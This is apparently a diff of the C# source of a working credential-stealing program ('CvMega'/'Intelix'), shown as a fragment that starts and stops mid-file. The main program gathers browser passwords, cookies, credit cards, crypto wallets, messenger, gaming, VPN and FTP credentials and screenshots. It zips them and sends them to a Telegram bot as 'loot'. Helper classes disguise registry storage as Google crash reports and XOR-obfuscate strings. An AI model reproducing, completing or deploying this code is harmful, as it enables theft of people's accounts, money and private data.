|
||||
for (int i = 0; i < length; i++)
|
||||
{
|
||||
stringBuilder.Append(chars[random.Next(chars.Length)]);
|
||||
}
|
||||
return stringBuilder.ToString();
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,60 @@
|
||||
using Microsoft.Win32;
|
||||
|
||||
namespace CvMega.Helper;
|
||||
|
||||
internal class RegeditKey
|
||||
{
|
||||
public static string Regkey = "SOFTWARE\\Google\\CrashReports";
|
||||
|
||||
public static bool CheckValue(string name)
|
||||
{
|
||||
using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64))
|
||||
{
|
||||
using RegistryKey registryKey2 = registryKey.CreateSubKey(Regkey, writable: false);
|
||||
if (registryKey2.GetValue(name) != null)
|
||||
{
|
||||
return true;
|
||||
}
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
public static void SetValue(string name, string value)
|
||||
{
|
||||
using RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64);
|
||||
using RegistryKey registryKey2 = registryKey.CreateSubKey(Regkey, writable: true);
|
||||
if (CheckValue(name))
|
||||
{
|
||||
registryKey2.DeleteValue(name);
|
||||
}
|
||||
registryKey2.SetValue(name, value);
|
||||
}
|
||||
|
||||
public static string GetValue(string name)
|
||||
{
|
||||
if (!CheckValue(name))
|
||||
{
|
||||
return null;
|
||||
}
|
||||
using RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64);
|
||||
using RegistryKey registryKey2 = registryKey.CreateSubKey(Regkey, writable: false);
|
||||
return (string)registryKey2.GetValue(name);
|
||||
}
|
||||
|
||||
public static string[] GetValues()
|
||||
{
|
||||
using RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64);
|
||||
using RegistryKey registryKey2 = registryKey.CreateSubKey(Regkey, writable: false);
|
||||
return registryKey2.GetValueNames();
|
||||
}
|
||||
|
||||
public static void DeleteValue(string name)
|
||||
{
|
||||
using RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64);
|
||||
using RegistryKey registryKey2 = registryKey.CreateSubKey(Regkey, writable: true);
|
||||
if (CheckValue(name))
|
||||
{
|
||||
registryKey2.DeleteValue(name);
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,59 @@
|
||||
using System;
|
||||
using System.Security.Cryptography;
|
||||
using System.Text;
|
||||
using System.Web;
|
||||
|
||||
namespace CvMega.Helper;
|
||||
|
||||
public class SimpleEncryptor
|
||||
{
|
||||
public static readonly string secretKey = "cvls0";
|
||||
|
||||
public static string Encrypt(string data)
|
||||
{
|
||||
return HttpUtility.UrlEncode(Convert.ToBase64String(XorEncrypt(Encoding.UTF8.GetBytes(data))));
|
||||
}
|
||||
|
||||
public static string EncryptNonEnc(string data)
|
||||
{
|
||||
return Convert.ToBase64String(XorEncrypt(Encoding.UTF8.GetBytes(data)));
|
||||
}
|
||||
|
||||
public static string Decrypt(string data)
|
||||
{
|
||||
return Encoding.UTF8.GetString(XorEncrypt(Convert.FromBase64String(data)));
|
||||
}
|
||||
|
||||
public static string Hash(string data)
|
||||
{
|
||||
using MD5 mD = MD5.Create();
|
||||
byte[] array = mD.ComputeHash(Encoding.UTF8.GetBytes(data));
|
||||
StringBuilder stringBuilder = new StringBuilder();
|
||||
byte[] array2 = array;
|
||||
foreach (byte b in array2)
|
||||
{
|
||||
stringBuilder.Append(b.ToString("x2"));
|
||||
}
|
||||
return HttpUtility.UrlEncode(stringBuilder.ToString().Substring(0, 10));
|
||||
}
|
||||
|
||||
public static byte[] XorEncryptMyKey(byte[] data, byte key)
|
||||
{
|
||||
byte[] array = new byte[data.Length];
|
||||
for (int i = 0; i < data.Length; i++)
|
||||
{
|
||||
array[i] = (byte)(data[i] ^ key);
|
||||
}
|
||||
return array;
|
||||
}
|
||||
|
||||
public static byte[] XorEncrypt(byte[] dataBytes)
|
||||
{
|
||||
byte[] bytes = Encoding.UTF8.GetBytes(secretKey);
|
||||
for (int i = 0; i < dataBytes.Length; i++)
|
||||
{
|
||||
dataBytes[i] ^= bytes[i % bytes.Length];
|
||||
}
|
||||
return dataBytes;
|
||||
}
|
||||
}
|
||||
Binary file not shown.
@@ -0,0 +1,403 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Net.Http;
|
||||
using System.Net.Http.Headers;
|
||||
using System.Text;
|
||||
using System.Threading;
|
||||
using System.Threading.Tasks;
|
||||
using System.Linq;
|
||||
using Intelix.Helper;
|
||||
using Intelix.Helper.Data;
|
||||
using Intelix.Targets;
|
||||
using Intelix.Targets.Applications;
|
||||
using Intelix.Targets.Browsers;
|
||||
using Intelix.Targets.Crypto;
|
||||
using Intelix.Targets.Device;
|
||||
using Intelix.Targets.Games;
|
||||
using Intelix.Targets.Messangers;
|
||||
using Intelix.Targets.Vpn;
|
||||
|
||||
namespace CvMega;
|
||||
|
||||
public class Program
|
||||
{
|
||||
public static List<ITarget> targetsBrowsers = new List<ITarget>
|
||||
{
|
||||
new Chromium(),
|
||||
new Gecko()
|
||||
};
|
||||
|
||||
public static List<ITarget> targets = new List<ITarget>
|
||||
{
|
||||
new ScreenShot(),
|
||||
new GameList(),
|
||||
new InstalledBrowsers(),
|
||||
new InstalledPrograms(),
|
||||
new ProcessDump(),
|
||||
new ProductKey(),
|
||||
new SystemInfo(),
|
||||
new WifiKey(),
|
||||
new Telegram(),
|
||||
new Discord(),
|
||||
new Element(),
|
||||
new Icq(),
|
||||
new MicroSIP(),
|
||||
new Jabber(),
|
||||
new Outlook(),
|
||||
new Pidgin(),
|
||||
new Signal(),
|
||||
new Skype(),
|
||||
new Tox(),
|
||||
new Viber(),
|
||||
new Minecraft(),
|
||||
new BattleNet(),
|
||||
new Epic(),
|
||||
new Riot(),
|
||||
new Roblox(),
|
||||
new Steam(),
|
||||
new Uplay(),
|
||||
new XBox(),
|
||||
new Growtopia(),
|
||||
new ElectronicArts(),
|
||||
new Rdp(),
|
||||
new AnyDesk(),
|
||||
new CyberDuck(),
|
||||
new DynDns(),
|
||||
new FileZilla(),
|
||||
new Ngrok(),
|
||||
new PlayIt(),
|
||||
new TeamViewer(),
|
||||
new WinSCP(),
|
||||
new TotalCommander(),
|
||||
new FTPNavigator(),
|
||||
new FTPRush(),
|
||||
new CoreFtp(),
|
||||
new FTPGetter(),
|
||||
new FTPCommander(),
|
||||
new TeamSpeak(),
|
||||
new Obs(),
|
||||
new GithubGui(),
|
||||
new NoIp(),
|
||||
new FoxMail(),
|
||||
new Navicat(),
|
||||
new RDCMan(),
|
||||
new Sunlogin(),
|
||||
new Xmanager(),
|
||||
new JetBrains(),
|
||||
new PuTTY(),
|
||||
new Cisco(),
|
||||
new RadminVPN(),
|
||||
new CyberGhost(),
|
||||
new ExpressVPN(),
|
||||
new HideMyName(),
|
||||
new IpVanish(),
|
||||
new MullVad(),
|
||||
new NordVpn(),
|
||||
new OpenVpn(),
|
||||
new PIAVPN(),
|
||||
new ProtonVpn(),
|
||||
new Proxifier(),
|
||||
new SurfShark(),
|
||||
new Hamachi(),
|
||||
new WireGuard(),
|
||||
new SoftEther(),
|
||||
new CryptoDesktop(),
|
||||
new Grabber(),
|
||||
new UserAgentGenerator(),
|
||||
new CryptoChromium(),
|
||||
new CryptoGecko()
|
||||
};
|
||||
|
||||
public static StringBuilder stringBuilderError = new StringBuilder();
|
||||
|
||||
public static async Task Main(string[] args)
|
||||
{
|
||||
string botToken = "ur token";
|
||||
string chatId = "1781548144";
|
||||
string userName = Environment.UserName;
|
||||
string machineName = Environment.MachineName;
|
||||
string userIdentifier = $"{userName}@{machineName}";
|
||||
|
||||
string arguments = string.Join(" ", args);
|
||||
|
||||
if (arguments.Contains("--run-once"))
|
||||
{
|
||||
string exeDirectory = AppDomain.CurrentDomain.BaseDirectory;
|
||||
string path = Path.Combine(exeDirectory, "crashreport.txt");
|
||||
if (File.Exists(path))
|
||||
{
|
||||
return;
|
||||
}
|
||||
File.Create(path);
|
||||
}
|
||||
|
||||
// Collect and send data
|
||||
await CollectAndSendDataViaTelegram(botToken, chatId, userIdentifier);
|
||||
}
|
||||
|
||||
public class CollectionResult
|
||||
{
|
||||
public string ZipPath { get; set; }
|
||||
public Counter Counter { get; set; }
|
||||
}
|
||||
|
||||
public static async Task<CollectionResult> CollectAndZipDataAsync()
|
||||
{
|
||||
string tempDir = Path.GetTempPath();
|
||||
string userName = Environment.UserName;
|
||||
string machineName = Environment.MachineName;
|
||||
string userIdentifier = $"{userName}@{machineName}";
|
||||
|
||||
string finalZipName = $"{userIdentifier}.zip";
|
||||
string finalZipPath = Path.Combine(tempDir, finalZipName);
|
||||
|
||||
InMemoryZip zip = new InMemoryZip();
|
||||
Counter counter = new Counter();
|
||||
|
||||
try
|
||||
{
|
||||
try
|
||||
{
|
||||
Task<string> ipTask = Task.Run(() => IpApi.GetPublicIp());
|
||||
|
||||
Task.WaitAll(Task.Run(delegate
|
||||
{
|
||||
Parallel.ForEach(targets, delegate (ITarget target)
|
||||
{
|
||||
try
|
||||
{
|
||||
target.Collect(zip, counter);
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
stringBuilderError.AppendLine($"[TARGET: {target.GetType().Name}] {ex.Message}");
|
||||
}
|
||||
});
|
||||
}), Task.Run(delegate
|
||||
{
|
||||
ProcessKiller.KillerAll();
|
||||
Thread.Sleep(200);
|
||||
Parallel.ForEach(targetsBrowsers, delegate (ITarget target)
|
||||
{
|
||||
try
|
||||
{
|
||||
target.Collect(zip, counter);
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
stringBuilderError.AppendLine($"[BROWSER: {target.GetType().Name}] {ex.Message}");
|
||||
}
|
||||
});
|
||||
}));
|
||||
|
||||
counter.Collect(zip);
|
||||
|
||||
zip.AddTextFile("Error.txt", stringBuilderError.ToString());
|
||||
|
||||
// Save the zip file
|
||||
byte[] zipData = zip.ToArray();
|
||||
File.WriteAllBytes(finalZipPath, zipData);
|
||||
|
||||
return new CollectionResult { ZipPath = finalZipPath, Counter = counter };
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
stringBuilderError.AppendLine($"Error during data collection: {ex.Message}");
|
||||
return new CollectionResult { ZipPath = null, Counter = counter };
|
||||
}
|
||||
}
|
||||
finally
|
||||
{
|
||||
if (zip != null)
|
||||
{
|
||||
((IDisposable)zip).Dispose();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
public static async Task CollectAndSendDataViaTelegram(string botToken, string chatId, string userIdentifier)
|
||||
{
|
||||
var result = await CollectAndZipDataAsync();
|
||||
|
||||
if (!string.IsNullOrEmpty(result.ZipPath) && File.Exists(result.ZipPath))
|
||||
{
|
||||
try
|
||||
{
|
||||
byte[] zipData = File.ReadAllBytes(result.ZipPath);
|
||||
|
||||
string userName = Environment.UserName;
|
||||
string machineName = Environment.MachineName;
|
||||
string userIdentifierLocal = $"{userName}@{machineName}";
|
||||
|
||||
string fileNameForArchive = userIdentifierLocal;
|
||||
|
||||
string publicIp = "N/A";
|
||||
try
|
||||
{
|
||||
publicIp = IpApi.GetPublicIp();
|
||||
}
|
||||
catch (Exception) { }
|
||||
|
||||
// Calculate actual counts from the counter that was used during collection
|
||||
int totalPasswords = result.Counter.Browsers.Sum(b => (int)(long)b.Password);
|
||||
int totalCookies = result.Counter.Browsers.Sum(b => (int)(long)b.Cookies);
|
||||
int totalWallets = result.Counter.CryptoDesktop.Count + result.Counter.CryptoChromium.Count;
|
||||
int totalApplications = result.Counter.Applications.Count;
|
||||
int totalGames = result.Counter.Games.Count;
|
||||
int totalVpns = result.Counter.Vpns.Count;
|
||||
int totalMessengers = result.Counter.Messangers.Count;
|
||||
|
||||
// Create message that works for both Telegram and Discord
|
||||
string caption = $"**✨ New Log Received ✨**\n\n" +
|
||||
$"**💻 User:** `{userIdentifierLocal}`\n" +
|
||||
$"**🌍 IP:** `{publicIp}`\n\n" +
|
||||
$"**📊 Main Loot:**\n" +
|
||||
$"**🔑 Passwords:** `{totalPasswords}`\n" +
|
||||
$"**🍪 Cookies:** `{totalCookies}`\n" +
|
||||
$"**💰 Wallets:** `{totalWallets}`\n\n" +
|
||||
$"**📦 Additional Data:**\n" +
|
||||
$"**📱 Applications:** `{totalApplications}`\n" +
|
||||
$"**🎮 Games:** `{totalGames}`\n" +
|
||||
$"**🔒 VPNs:** `{totalVpns}`\n" +
|
||||
$"**💬 Messengers:** `{totalMessengers}`\n\n" +
|
||||
$"**👨💻 Developer:** `@tcixt`";
|
||||
|
||||
// Send via Telegram (convert markdown to HTML properly)
|
||||
string telegramCaption = ConvertMarkdownToHtml(caption);
|
||||
|
||||
await SendToTelegram(botToken.TrimEnd('\0'), chatId.TrimEnd('\0'), zipData, fileNameForArchive, telegramCaption);
|
||||
|
||||
// Clean up
|
||||
try { File.Delete(result.ZipPath); } catch { }
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
// Log error but don't crash
|
||||
File.AppendAllText("error.log", $"{DateTime.Now}: {ex}\n");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Helper method to convert markdown to HTML for Telegram
|
||||
private static string ConvertMarkdownToHtml(string markdown)
|
||||
{
|
||||
string result = markdown;
|
||||
|
||||
// Convert **text** to <b>text</b>
|
||||
while (result.Contains("**"))
|
||||
{
|
||||
int firstIndex = result.IndexOf("**");
|
||||
if (firstIndex >= 0)
|
||||
{
|
||||
int secondIndex = result.IndexOf("**", firstIndex + 2);
|
||||
if (secondIndex >= 0)
|
||||
{
|
||||
string beforeFirst = result.Substring(0, firstIndex);
|
||||
string betweenTags = result.Substring(firstIndex + 2, secondIndex - firstIndex - 2);
|
||||
string afterSecond = result.Substring(secondIndex + 2);
|
||||
result = beforeFirst + "<b>" + betweenTags + "</b>" + afterSecond;
|
||||
}
|
||||
else
|
||||
{
|
||||
break; // No closing tag found
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Convert `text` to <code>text</code>
|
||||
while (result.Contains("`"))
|
||||
{
|
||||
int firstIndex = result.IndexOf("`");
|
||||
if (firstIndex >= 0)
|
||||
{
|
||||
int secondIndex = result.IndexOf("`", firstIndex + 1);
|
||||
if (secondIndex >= 0)
|
||||
{
|
||||
string beforeFirst = result.Substring(0, firstIndex);
|
||||
string betweenTags = result.Substring(firstIndex + 1, secondIndex - firstIndex - 1);
|
||||
string afterSecond = result.Substring(secondIndex + 1);
|
||||
result = beforeFirst + "<code>" + betweenTags + "</code>" + afterSecond;
|
||||
}
|
||||
else
|
||||
{
|
||||
break; // No closing tag found
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return result;
|
||||
}
|
||||
|
||||
public static async Task SendToTelegram(string botToken, string chatId, byte[] file, string fileName, string caption)
|
||||
{
|
||||
if (file == null || file.Length == 0)
|
||||
{
|
||||
return;
|
||||
}
|
||||
|
||||
try
|
||||
{
|
||||
using HttpClient httpClient = new HttpClient();
|
||||
httpClient.DefaultRequestHeaders.UserAgent.ParseAdd("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36");
|
||||
|
||||
string url = $"https://api.telegram.org/bot{botToken}/sendDocument";
|
||||
using MultipartFormDataContent multipartFormDataContent = new MultipartFormDataContent();
|
||||
|
||||
multipartFormDataContent.Add(new StringContent(chatId), "chat_id");
|
||||
multipartFormDataContent.Add(new StringContent(caption), "caption");
|
||||
multipartFormDataContent.Add(new StringContent("HTML"), "parse_mode");
|
||||
|
||||
using ByteArrayContent byteArrayContent = new ByteArrayContent(file);
|
||||
byteArrayContent.Headers.ContentType = MediaTypeHeaderValue.Parse("application/zip");
|
||||
|
||||
string zipFileName = $"{fileName}.zip";
|
||||
|
||||
multipartFormDataContent.Add(byteArrayContent, "document", zipFileName);
|
||||
|
||||
HttpResponseMessage response = await httpClient.PostAsync(url, multipartFormDataContent);
|
||||
|
||||
if (!response.IsSuccessStatusCode)
|
||||
{
|
||||
string errorBody = await response.Content.ReadAsStringAsync();
|
||||
string errorMsg = $"Failed to send document. Status: {response.StatusCode}, Body: {errorBody}";
|
||||
File.AppendAllText("telegram_error.log", $"{DateTime.Now}: {errorMsg}\n");
|
||||
}
|
||||
}
|
||||
catch (HttpRequestException httpEx)
|
||||
{
|
||||
string errorMsg = $"HTTP request failed: {httpEx.Message}";
|
||||
File.AppendAllText("telegram_error.log", $"{DateTime.Now}: HttpRequestException: {httpEx}\n");
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
string errorMsg = $"Failed to send document: {ex.Message}";
|
||||
File.AppendAllText("telegram_error.log", $"{DateTime.Now}: Exception: {ex}\n");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -0,0 +1,4 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Weavers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="FodyWeavers.xsd">
|
||||
<Costura />
|
||||
</Weavers>
|
||||
@@ -0,0 +1,141 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
|
||||
<!-- This file was generated by Fody. Manual changes to this file will be lost when your project is rebuilt. -->
|
||||
<xs:element name="Weavers">
|
||||
<xs:complexType>
|
||||
<xs:all>
|
||||
<xs:element name="Costura" minOccurs="0" maxOccurs="1">
|
||||
<xs:complexType>
|
||||
<xs:all>
|
||||
<xs:element minOccurs="0" maxOccurs="1" name="ExcludeAssemblies" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:element>
|
||||
<xs:element minOccurs="0" maxOccurs="1" name="IncludeAssemblies" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:element>
|
||||
<xs:element minOccurs="0" maxOccurs="1" name="ExcludeRuntimeAssemblies" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:element>
|
||||
<xs:element minOccurs="0" maxOccurs="1" name="IncludeRuntimeAssemblies" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:element>
|
||||
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged32Assemblies" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with line breaks.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:element>
|
||||
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged64Assemblies" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with line breaks.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:element>
|
||||
<xs:element minOccurs="0" maxOccurs="1" name="PreloadOrder" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>The order of preloaded assemblies, delimited with line breaks.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:element>
|
||||
</xs:all>
|
||||
<xs:attribute name="CreateTemporaryAssemblies" type="xs:boolean">
|
||||
<xs:annotation>
|
||||
<xs:documentation>This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="IncludeDebugSymbols" type="xs:boolean">
|
||||
<xs:annotation>
|
||||
<xs:documentation>Controls if .pdbs for reference assemblies are also embedded.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="IncludeRuntimeReferences" type="xs:boolean">
|
||||
<xs:annotation>
|
||||
<xs:documentation>Controls if runtime assemblies are also embedded.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="UseRuntimeReferencePaths" type="xs:boolean">
|
||||
<xs:annotation>
|
||||
<xs:documentation>Controls whether the runtime assemblies are embedded with their full path or only with their assembly name.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="DisableCompression" type="xs:boolean">
|
||||
<xs:annotation>
|
||||
<xs:documentation>Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="DisableCleanup" type="xs:boolean">
|
||||
<xs:annotation>
|
||||
<xs:documentation>As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="LoadAtModuleInit" type="xs:boolean">
|
||||
<xs:annotation>
|
||||
<xs:documentation>Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="IgnoreSatelliteAssemblies" type="xs:boolean">
|
||||
<xs:annotation>
|
||||
<xs:documentation>Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="ExcludeAssemblies" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="IncludeAssemblies" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="ExcludeRuntimeAssemblies" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="IncludeRuntimeAssemblies" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="Unmanaged32Assemblies" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with |.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="Unmanaged64Assemblies" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with |.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="PreloadOrder" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>The order of preloaded assemblies, delimited with |.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
</xs:complexType>
|
||||
</xs:element>
|
||||
</xs:all>
|
||||
<xs:attribute name="VerifyAssembly" type="xs:boolean">
|
||||
<xs:annotation>
|
||||
<xs:documentation>'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="VerifyIgnoreCodes" type="xs:string">
|
||||
<xs:annotation>
|
||||
<xs:documentation>A comma-separated list of error codes that can be safely ignored in assembly verification.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
<xs:attribute name="GenerateXsd" type="xs:boolean">
|
||||
<xs:annotation>
|
||||
<xs:documentation>'false' to turn off automatic generation of the XML Schema file.</xs:documentation>
|
||||
</xs:annotation>
|
||||
</xs:attribute>
|
||||
</xs:complexType>
|
||||
</xs:element>
|
||||
</xs:schema>
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,194 @@
|
||||
using System.Collections.Concurrent;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using Intelix.Helper.Encrypted;
|
||||
|
||||
namespace Intelix.Helper.Data;
|
||||
|
||||
public class Counter
|
||||
{
|
||||
public class CounterBrowser
|
||||
{
|
||||
public string Profile;
|
||||
|
||||
public string BrowserName;
|
||||
|
||||
public ConcurrentLong Cookies = new ConcurrentLong(0);
|
||||
|
||||
public ConcurrentLong Password = new ConcurrentLong(0);
|
||||
|
||||
public ConcurrentLong CreditCards = new ConcurrentLong(0);
|
||||
|
||||
public ConcurrentLong AutoFill = new ConcurrentLong(0);
|
||||
|
||||
public ConcurrentLong RestoreToken = new ConcurrentLong(0);
|
||||
|
||||
public ConcurrentLong MaskCreditCard = new ConcurrentLong(0);
|
||||
|
||||
public ConcurrentLong MaskedIban = new ConcurrentLong(0);
|
||||
}
|
||||
|
||||
public class CounterApplications
|
||||
{
|
||||
public string Name;
|
||||
|
||||
public ConcurrentBag<string> Files = new ConcurrentBag<string>();
|
||||
}
|
||||
|
||||
public ConcurrentBag<string> FilesGrabber = new ConcurrentBag<string>();
|
||||
|
||||
public ConcurrentBag<string> CryptoDesktop = new ConcurrentBag<string>();
|
||||
|
||||
public ConcurrentBag<string> CryptoChromium = new ConcurrentBag<string>();
|
||||
|
||||
public ConcurrentBag<CounterBrowser> Browsers = new ConcurrentBag<CounterBrowser>();
|
||||
|
||||
public ConcurrentBag<CounterApplications> Applications = new ConcurrentBag<CounterApplications>();
|
||||
|
||||
public ConcurrentBag<CounterApplications> Vpns = new ConcurrentBag<CounterApplications>();
|
||||
|
||||
public ConcurrentBag<CounterApplications> Games = new ConcurrentBag<CounterApplications>();
|
||||
|
||||
public ConcurrentBag<CounterApplications> Messangers = new ConcurrentBag<CounterApplications>();
|
||||
|
||||
public void Collect(InMemoryZip zip)
|
||||
{
|
||||
List<string> list = new List<string>();
|
||||
list.Add("\r\n \r\n _____ _ \r\n|_ _|____ _(_)\r\n | |/ _ \\ \\/ / |\r\n | | (_) > <| |\r\n |_|\\___/_/\\_\\_|\r\n ");
|
||||
list.Add(" Developer @tcixt");
|
||||
list.Add("");
|
||||
List<string[]> masterKeys = LocalState.GetMasterKeys();
|
||||
if (masterKeys.Count() > 0)
|
||||
{
|
||||
list.Add(string.Format("[Keys] [--{0}--] [{1}]", masterKeys.Count(), string.Join(", ", masterKeys.Select((string[] k) => Paths.GetBrowserName(k[0])).Distinct())));
|
||||
foreach (string[] item in masterKeys)
|
||||
{
|
||||
list.Add(" [" + Paths.GetBrowserName(item[0]) + " " + item[1] + "] " + item[2]);
|
||||
}
|
||||
list.Add("");
|
||||
}
|
||||
if (Browsers.Count() > 0)
|
||||
{
|
||||
list.Add(string.Format("[Browsers] [--{0}--] [{1}]", Browsers.Count(), string.Join(", ", Browsers.Select((CounterBrowser b) => b.BrowserName).ToArray())));
|
||||
foreach (CounterBrowser browser in Browsers)
|
||||
{
|
||||
list.Add(" - " + browser.Profile);
|
||||
if ((long)browser.Cookies != 0L)
|
||||
{
|
||||
list.Add($" [Cookies {(long)browser.Cookies}]");
|
||||
}
|
||||
if ((long)browser.Password != 0L)
|
||||
{
|
||||
list.Add($" [Passwords {(long)browser.Password}]");
|
||||
}
|
||||
if ((long)browser.CreditCards != 0L)
|
||||
{
|
||||
list.Add($" [CreditCards {(long)browser.CreditCards}]");
|
||||
}
|
||||
if ((long)browser.AutoFill != 0L)
|
||||
{
|
||||
list.Add($" [AutoFill {(long)browser.AutoFill}]");
|
||||
}
|
||||
if ((long)browser.RestoreToken != 0L)
|
||||
{
|
||||
list.Add($" [RestoreToken {(long)browser.RestoreToken}]");
|
||||
}
|
||||
if ((long)browser.MaskCreditCard != 0L)
|
||||
{
|
||||
list.Add($" [MaskCreditCard {(long)browser.MaskCreditCard}]");
|
||||
}
|
||||
if ((long)browser.MaskedIban != 0L)
|
||||
{
|
||||
list.Add($" [MaskedIban {(long)browser.MaskedIban}]");
|
||||
}
|
||||
list.Add("");
|
||||
}
|
||||
list.Add("");
|
||||
}
|
||||
if (Applications.Count() > 0)
|
||||
{
|
||||
list.Add(string.Format("[Applications] [--{0}--] [{1}]", Applications.Count(), string.Join(", ", Applications.Select((CounterApplications b) => b.Name).ToArray())));
|
||||
foreach (CounterApplications application in Applications)
|
||||
{
|
||||
list.Add(" [Name " + application.Name + "]");
|
||||
foreach (string item2 in application.Files.Reverse())
|
||||
{
|
||||
list.Add(" - " + item2);
|
||||
}
|
||||
list.Add("");
|
||||
}
|
||||
list.Add("");
|
||||
}
|
||||
if (Games.Count() > 0)
|
||||
{
|
||||
list.Add(string.Format("[Games] [--{0}--] [{1}]", Games.Count(), string.Join(", ", Games.Select((CounterApplications b) => b.Name).ToArray())));
|
||||
foreach (CounterApplications game in Games)
|
||||
{
|
||||
list.Add(" [Name " + game.Name + "]");
|
||||
